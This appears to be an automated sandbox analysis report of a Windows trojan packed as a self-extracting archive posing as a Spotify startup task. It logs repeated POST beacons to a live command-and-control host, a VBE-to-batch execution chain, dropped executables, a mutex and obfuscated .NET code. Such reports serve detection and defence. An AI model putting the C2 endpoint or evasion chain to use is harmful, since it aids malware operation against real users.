                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global traffic DNS traffic detected: DNS query: 427176cm.nyashkoon.in
                                    Source: unknown HTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 427176cm.nyashkoon.in Content-Length: 336 Expect: 100-continue Connection: Keep-Alive
                                    Source: fontReviewsavesinto.exe, 00000011.00000002.3686700129.000000000370A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://427176cm.nyashkX
                                    Source: fontReviewsavesinto.exe, 00000011.00000002.3686700129.000000000370A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://427176cm.nyashkoon.in
                                    Source: fontReviewsavesinto.exe, 00000011.00000002.3686700129.0000000003406000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://427176cm.nyashkoon.in/
                                    Source: fontReviewsavesinto.exe, 00000011.00000002.3686700129.0000000003406000.00000004.00000800.00020000.00000000.sdmp, fontReviewsavesinto.exe, 00000011.00000002.3686700129.0000000003573000.00000004.00000800.00020000.00000000.sdmp, fontReviewsavesinto.exe, 00000011.00000002.3686700129.00000000036A5000.00000004.00000800.00020000.00000000.sdmp, fontReviewsavesinto.exe, 00000011.00000002.3686700129.000000000370A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral.php
                                    Source: fontReviewsavesinto.exe, 00000011.00000002.3686700129.000000000370A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://427176cm.nyashkoon.in_h
                                    Source: fontReviewsavesinto.exe, 0000000B.00000002.1337505438.000000000330C000.00000004.00000800.00020000.00000000.sdmp, fontReviewsavesinto.exe, 00000011.00000002.3686700129.0000000003406000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                                    System Summary

                                    Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exe Code function: 0_2_00F86FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 0_2_00F86FAA
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe File created: C:\Windows\Vss\Writers\Application\kRoaRVhtzmWNJQRz.exe
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe File created: C:\Windows\Vss\Writers\Application\8e184785bc19a8
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exe Code function: String function: 00F9EB78 appears 39 times
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exe Code function: String function: 00F9F5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exe Code function: String function: 00F9EC50 appears 56 times
                                    Source: HcEvQKWAu2.exe, 00000000.00000003.1221219115.0000000006F81000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs HcEvQKWAu2.exe
                                    Source: HcEvQKWAu2.exe, 00000000.00000003.1220726109.0000000006680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs HcEvQKWAu2.exe
                                    Source: HcEvQKWAu2.exe Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs HcEvQKWAu2.exe
                                    Source: HcEvQKWAu2.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: fontReviewsavesinto.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: kRoaRVhtzmWNJQRz.exe.11.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: kRoaRVhtzmWNJQRz.exe0.11.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, W9tBG94LH5Z9xqvOxZb.cs Cryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, W9tBG94LH5Z9xqvOxZb.cs Cryptographic APIs: 'CreateDecryptor'
                                    Source: classification engine Classification label: mal100.troj.evad.winEXE@18/18@1/1
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exe Code function: 0_2_00F86C74 GetLastError,FormatMessageW, 0_2_00F86C74
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exe Code function: 0_2_00F9A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 0_2_00F9A6C2
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe File created: C:\Program Files (x86)\windowspowershell\Configuration\Schema\kRoaRVhtzmWNJQRz.exe
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fontReviewsavesinto.exe.log
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Mutant created: NULL
                                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2172:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-CaL7zfwyS1Lcmm7w4GYk
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe File created: C:\Users\user\AppData\Local\Temp\CotttcHbSw
                                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ComponentSavesinto\ZNtisV5JM91TmuX3tDFXvJx7ah2q8kJOB5hVZXHXTCGj5p.bat" "
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exe Command line argument: sfxname 0_2_00F9DF1E
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exe Command line argument: sfxstime 0_2_00F9DF1E
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exe Command line argument: STARTDLG 0_2_00F9DF1E
                                    Source: HcEvQKWAu2.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: HcEvQKWAu2.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exe File read: C:\Windows\win.ini
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                    Source: HcEvQKWAu2.exe ReversingLabs: Detection: 63%
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exe File read: C:\Users\user\Desktop\HcEvQKWAu2.exe
                                    Source: unknown Process created: C:\Users\user\Desktop\HcEvQKWAu2.exe "C:\Users\user\Desktop\HcEvQKWAu2.exe"
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ComponentSavesinto\Rvb4MehGYPWwP7mOC7L2KZoGBB7qbkXbVDhXcse7w1B6.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ComponentSavesinto\ZNtisV5JM91TmuX3tDFXvJx7ah2q8kJOB5hVZXHXTCGj5p.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\ComponentSavesinto\fontReviewsavesinto.exe "C:\ComponentSavesinto/fontReviewsavesinto.exe"
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\F0ZVhIKmod.bat"
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\ComponentSavesinto\fontReviewsavesinto.exe "C:\ComponentSavesinto\fontReviewsavesinto.exe"
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                                    Source: Window Recorder Window detected: More than 3 window changes detected
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                    Source: HcEvQKWAu2.exe Static file information: File size 1962809 > 1048576
                                    Source: HcEvQKWAu2.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: HcEvQKWAu2.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: HcEvQKWAu2.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: HcEvQKWAu2.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: HcEvQKWAu2.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: HcEvQKWAu2.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: HcEvQKWAu2.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: HcEvQKWAu2.exe
                                    Source: HcEvQKWAu2.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: HcEvQKWAu2.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: HcEvQKWAu2.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: HcEvQKWAu2.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: HcEvQKWAu2.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                    Data Obfuscation

                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, W9tBG94LH5Z9xqvOxZb.cs .Net Code: Type.GetTypeFromHandle(RWYBEe3xcp7ogI1NWuw.ymQtAY26Kut(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(RWYBEe3xcp7ogI1NWuw.ymQtAY26Kut(16777245)),Type.GetTypeFromHandle(RWYBEe3xcp7ogI1NWuw.ymQtAY26Kut(16777259))})
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, W9tBG94LH5Z9xqvOxZb.cs .Net Code: Type.GetTypeFromHandle(RWYBEe3xcp7ogI1NWuw.ymQtAY26Kut(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(RWYBEe3xcp7ogI1NWuw.ymQtAY26Kut(16777245)),Type.GetTypeFromHandle(RWYBEe3xcp7ogI1NWuw.ymQtAY26Kut(16777259))})
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exe File created: C:\ComponentSavesinto\__tmp_rar_sfx_access_check_6249281
                                    Source: HcEvQKWAu2.exe Static PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exe Code function: 0_2_00F9F640 push ecx; ret 0_2_00F9F653
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exe Code function: 0_2_00F9EB78 push eax; ret 0_2_00F9EB96
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exe Code function: 17_2_00007FFAAC5B18C2 pushad ; retf 17_2_00007FFAAC5B1931
                                    Source: fontReviewsavesinto.exe.0.dr Static PE information: section name: .text entropy: 7.422746735735013
                                    Source: kRoaRVhtzmWNJQRz.exe.11.dr Static PE information: section name: .text entropy: 7.422746735735013
                                    Source: kRoaRVhtzmWNJQRz.exe0.11.dr Static PE information: section name: .text entropy: 7.422746735735013
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, tBJwkbDRpZDTyd2BpGM.cs High entropy of concatenated method names
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, GHE8iLKuaOwoPqPJHWo.cs High entropy of concatenated method names
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, UcH5l0KMdkQRHXrbeeb.cs High entropy of concatenated method names
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, mGPxmXgDEhcWNPFJsRL.cs High entropy of concatenated method names
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, H6o2wG4dHDc433U6hgs.cs High entropy of concatenated method names
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, mYsVmWWIvKgsXj7PmMo.cs High entropy of concatenated method names
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, AAikcCbvS5ULRoDXRY0.cs High entropy of concatenated method names
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, W9tBG94LH5Z9xqvOxZb.cs High entropy of concatenated method names
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, dMryjfOS24URISgqbgt.cs High entropy of concatenated method names
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, WkeBIwPgxR6eOopjOtd.cs High entropy of concatenated method names
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, yvb7qaA0LXxCblWAv9M.cs High entropy of concatenated method names
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, EeIv5eT6iE60OVwqLax.cs High entropy of concatenated method names
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, R67UnnhS9MHSxs3vmX4.cs High entropy of concatenated method names
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, XEP8PP9krMXjsBsD37m.cs High entropy of concatenated method names
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, ajT1mDREXs6YQ7Cn5Py.cs High entropy of concatenated method names
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, VTx3Br3JvBFkSIq6OPV.cs High entropy of concatenated method names
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, hZjM8BElPJOK4bAhRFg.cs High entropy of concatenated method names
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, bHVqBO3ulf79bxqxpSB.cs High entropy of concatenated method names
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, DAje7a5KAfsvphO7BYY.csHigh entropy of concatenated method names: 'Gvp5bHTKMd', 'R4L5c3j24Q', 'BwO5ROIbMM', 'method_0', 'method_1', 'Fc2', 'method_2', 'method_3', 'DB1', 'UCA5Q1M7NT'
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, tQWeqTkq8UI0wXnYYoJ.csHigh entropy of concatenated method names: 'UwYiRv4Am6k', 'INkk1rxmdB', 'F0VkaaV8Cb', 'MrhkY1mnOG', 'FqrDyDim7wDvIQCrkbDv', 'YhxN8BimZTYUcnU1teZE', 'q6IMn1imNrDBtePG0EJh', 'NEisuDim5Hn4928vW5ds', 'KR4OCpimDw1SE89e2GUM', 'JpCPbXimTIMrNEgaG4xY'
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, RyKKw2NlCZey37qqERD.csHigh entropy of concatenated method names: 'iYXNBDwnsr', 'a1MpCmiaJi9p7QnrWy5s', 'XvaScXiaCSUpbX2UO8ic', 'TMdtOFiaLQDLdXPFb5lF', 'PGWbumia9gs9MEmfxEpo', 'TliqOTiaPBcK6nNN87jN', 'YrZBRRia6K8JIjkL04VB'
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, TFYodG9mkaSiJdJKUU7.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 't00iRlXfBSk', 'nTgiKFn7dPb', 'WHo4LHiOTsIBHtyP6M2Y', 'KmqJ2ViOhKHM7fS2aU7p', 'nAf5VTiOseldbuHu9hY2', 'bE5xXWiOSAb90HXZUda1', 'jdCNgZiOUZakljd4lCPe'
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, jcXA68cpfn8h8gu5jMe.csHigh entropy of concatenated method names: 'YCQcg4XWeu', 'U24c4m1N9D', 'C6MmN8isX2dI0tdkeXUx', 'J57qKcisQT9VI6TguvCE', 'layWivisjf57vZvb82A9', 'KB0cEoisGBNjUMZOqgIU', 'cFHc0UKh37', 'Wb3cqSvMif', 'iA7cF8DneX', 'AB0c1BLSZN'
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, b5Xrv9AfdAhm52QOkok.csHigh entropy of concatenated method names: 'z1CA7aZQIM', 'tjLAZPuQmX', 'vXBANmICvU', 'A7MuXgiDpZ1nuotxhHMx', 'zgur58iDwfQPaY2btBXH', 'VXdi3WiDuxsOSIhXu6S6', 'AuWrnHiDOodOBRcYKWkb', 'dl4Ao42gWC', 'wBGAvTrV21', 'kZBXcbiDU7UXKpXB1PSN'
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, NiPwRU7WEKfkDUUiQs8.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'HOv7ARRtyw', 'Write', 'RHD7b9nqZ7', 'ok47cE5ZAF', 'Flush', 'vl7'
